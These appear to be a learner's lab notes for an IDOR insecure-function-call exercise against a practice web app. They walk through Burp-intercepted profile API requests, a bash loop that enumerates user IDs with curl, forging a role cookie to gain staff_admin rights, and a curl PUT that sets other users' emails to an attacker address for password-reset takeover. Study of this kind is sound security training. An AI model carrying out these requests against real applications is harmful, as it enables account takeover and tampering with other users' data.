INSECURE FUNCTION CALLS

this type of IDOR can be used to change another user's private information, reset another user's password, or even buy items using another user's payment information. this method first requires identifying an IDOR information disclosure vulnerability; only then can the insecure function calls be exercised.

#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile
 Full Name:
 Email:
 About:
 
#test for information disclosure
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  GET /profile/api.php/profile/1 HTTP/1.1                  //change the /1 to /5 to test IDOR information disclosure
  Host: 94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee
  
  * on some occasions the data is in an encoded form such as:
     - data
        - contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
        - uid=MQ%3D%3D
        - uid=1
     - URL
        - /download.php?contract=MQ%3D%3D
        
 * once idor information disclosure is identified, it can be used to perform idor insecure function calls
    - try to update the other user's info and intercept the traffic via BURP
       - this will reveal the other user's hidden info such as uid, uuid, etc
#information disclosure
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"c_woodhams@employees.htb",
    "about":"I don't like quoting others!"
  }
  
 * keep modifying the parameter value until an administrator account is identified
#test the security controls in place by manipulating the other parameters.
# * Change another user's uid to see if account takeover is possible
# * Create new users with arbitrary details, or delete existing users
# * Change another user's details to see if other web attacks are possible
# * Change to a more privileged role (e.g. admin) in order to perform more actions

# * HTTP Request methods
#    - PUT requests are used in APIs to update item details
#    - POST is used to create new items
#    - DELETE is used to delete items
#    - GET is used to retrieve item details.

#Change other user's uid to see if account takeover is possible
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"c_woodhams@employees.htb",
    "about":"I don't like quoting others!"
  }
  
 * unsuccessful: uuid mismatch
    - the webapp might be checking that the uuid value belongs to the uid being modified (a server-side ownership check, which is the control that blocks this request)
#Create new users with arbitrary details, or delete existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {POST} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Creating new employees is for admins only
 
#Deleting existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {DELETE} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Deleting employees is for admins only
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {PUT} /profile/api.php/profile/{1} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role={admin}

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{admin}",
    "full_name":"test",
    "email":"test@employees.htb",
    "about":"N/A"
  }
  
 * unsuccessful: Invalid role
#identify users with privileges
#perform a manual test for use in an enumeration script
root@oco:~$ curl -G "http://94.237.59.180:35708/profile/api.php/profile/1" | grep -i "about" --color=auto

#create an enumeration script
root@oco:~$ nano script.sh
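#!/bin/bash
# Enumerate profile IDs 1..10 on the target host and print the "about" field
# of each record returned. The endpoint returning other users' records here
# is the information disclosure that the rest of these notes build on.
#
# Usage: bash script.sh [host:port]
#   host:port defaults to the value used elsewhere in these notes.

# Host and port of the target; overridable via the first argument.
url="${1:-94.237.59.180:35708}"

for i in {1..10}; do
  # Fetch the profile record for each user ID and show its "about" field
  curl -G "http://${url}/profile/api.php/profile/${i}" | grep -i "about"
done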

root@oco:~$ bash script.sh
 {"uid":"10","uuid":"bfd92386a1b48076792e68b596846499","role":"staff_admin","full_name":"admin","email":"admin@employees.htb","about":"Never gonna give you up, Never gonna let you down"}
#access the admin profile & take over the admin's account, or set the attacker's profile to admin
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }

#verify change and updated privileges
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }

root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/1" | grep -i "about" --color=auto
 {"uid":"1","uuid":"40f5888b67c748df7efba008e7c2f9d2","role":"staff_admin","full_name":"31137","email":"31137@employee.htb","about":"Pwned."}
#test obtained privileges
#create/delete a profile/account
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }
  
  DELETE /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=staff_admin

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }
#test obtained privileges
#modify other users' data such as email addresses - setting an email address to an attacker-specified address can be used in a password reset attack & account takeover
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{3} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{3},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"31137@employee.htb",
    "about":"Pwned."
  }
  
  PUT /profile/api.php/profile/{3} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=staff_admin
  Connection: close

  {
    "uid":3,
    "uuid":"771409a8fb1543788fe7d91f1ea0987f",
    "role":"employee",
    "full_name":"Pwned",
    "email":"attacker@email.htb",
    "about":"Pwned."
  }

#verify changes
root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/3" | grep -i "about" --color=auto
 {"uid":"3","uuid":"771409a8fb1543788fe7d91f1ea0987f","role":"employee","full_name":"Pwned","email":"attacker@email.htb","about":"Pwned."}
#create a script that will modify all users' email addresses
#create a test command
root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/4" | grep -i "email" --color=auto
root@oco:~$ curl -X PUT "http://94.237.50.242:41103/profile/api.php/profile/4" -H "Content-Type: application/json" -H "Cookie: role=staff_admin" -d '{"uid":"4","uuid":"1a1f289428bd7ab3beb8a89d4c90b22f","email":"attacker@email.htb"}' | grep -i "email" --color=auto
 * this doesn't work yet; must do it manually for now via BURP
